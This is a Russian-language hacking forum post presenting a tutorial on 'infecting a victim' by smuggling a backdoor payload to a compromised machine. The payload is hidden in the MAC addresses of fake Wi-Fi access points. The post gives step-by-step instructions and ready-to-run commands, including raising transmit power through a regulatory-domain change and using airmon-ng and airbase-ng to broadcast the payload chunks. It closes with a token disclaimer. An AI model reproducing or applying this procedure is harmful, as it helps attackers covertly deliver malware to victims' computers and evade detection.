Перейти к содержимому



Фотография
  • Авторизуйтесь для ответа в теме
В этой теме нет ответов

#1 roguevad

roguevad

    Эксперт.

  • Пользователи
  • PipPipPipPipPip
  • 276 сообщений

Отправлено 28 Февраль 2021 - 01:46

Привет, хакеры!

Сегодня я расскажу о способе заражения жертвы вирусом через сеть Wi-Fi.

Итак, у нас есть в наличии backdoor payload. Не шифрованный и без всяких прочих приблуд способных защитить нас от обнаружения.

В данной схеме мы проводим атаку с помощью смены своего BSSID, это означает что вы сможете сменить свой BSSID и инфицировать свою цель шаг за шагом.

На заметку:

Вы можете использовать MANA-Toolkit: https://github.com/sensepost/mana.

Допустим у нас есть пейлоад “fec8b00011ddc00945f1”.
Что же нам необходимо делать далее?

Шаг 1

Нам необходимо создать фейковую точку доступа, которую мы назовём "Фейк" (что бы вам было понятнее) и мак адрес, у неё будет 00:fe:c8:b0:00:11

  • Мак адрес 00:fe:c8:b0:00:11 это наш загружаемый пейлоад т.к. название нашего пейлоада “fec8b00011ddc00945f1
  • Это секция пейлоада “fec8b00011ddc00945f1

Шаг 2

Система с беком сканит ESSID нашего фейка и дампит BSSID для неё.

  • Наш код должен сделать так: fe:c8:b0:00:11 ==> fec8b00011

Шаг 3

Атакующая система создаёт фейковую точку доступа с именем "Фейк" и маком 00:dd:c0:09:45:f1

  • Мак-адрес 00:dd:c0:09:45:f1 это наш инжектируемый пейлоад “ddc00945f1”
  • Это секция пейлоада “fec8b00011ddc00945f1”

Шаг 4

Система с бекдором должна дампить данную секцию BSSID или мак dd:c0:09:45:f1 ==> ddc00945f1

После данных шагов со сканом мы имеем пейлоад fec8b00011ddc00945f1 в инфицированной системе. Теперь, разобравшись как работает данный метод мы рассмотрим команды для создания фейк AP:

ifconfig wlan0 down

iw reg set BO

ifconfig wlan0 up

iwconfig wlan0 txpower 30

С помощью этих команд мы увеличиваем мощность нашей AP.

Примечание: эти команды нужно писать до создания wlan0mon для вашего wlan0. Создания монитора для wlan карты это обязательный шаг для создания фейковой AP. Делаем монитор этой командой: "airmon-ng start wlan0", если не работает, то используйте команду iwconfig и посмотрите название своего адаптера.

Далее пойдут команды с кратким описанием:

airmon-ng start wlan0 - запускаем интерфейс;

airbase-ng -a 00:fe:c8:b0:00:11 –essid “Fake” -I 10 -0 wlan0mon - делаем первый кусок пейлоада;

sleep 15 - дайте точке поспать 15 секунд;

killall airbase-ng - если у точки бессонница;

airbase-ng -a 00:dd:c0:09:45:f1 –essid “Fake” -I 10 -0 wlan0mon - второй кусок пейлоада;

sleep 15 - дайте точке поспать 15 секунд;

killall airbase-ng - если у точки бессонница.

 

Вся информация предоставлена лишь для ознакомления и не призывает к действиям. Автор не несет ответственности за использование этой информации.

 

 





Темы с аналогичным тегами взлом, взломщик, хакер, хакинг, взлом wifi, взлом вайфак, как взломать через вайфай, взлом с помощью wifi, заражение компьютера через wifi, вирус через wifi, опасность wifi, как заразить вирусом через wifi, вредносное по, вирус


Яндекс.Метрика Top.Mail.Ru Analysis Счетчик ИКС
Добавить Vkontakte Добавить в Facebook Добавить в Twitter Добавить в LiveJournal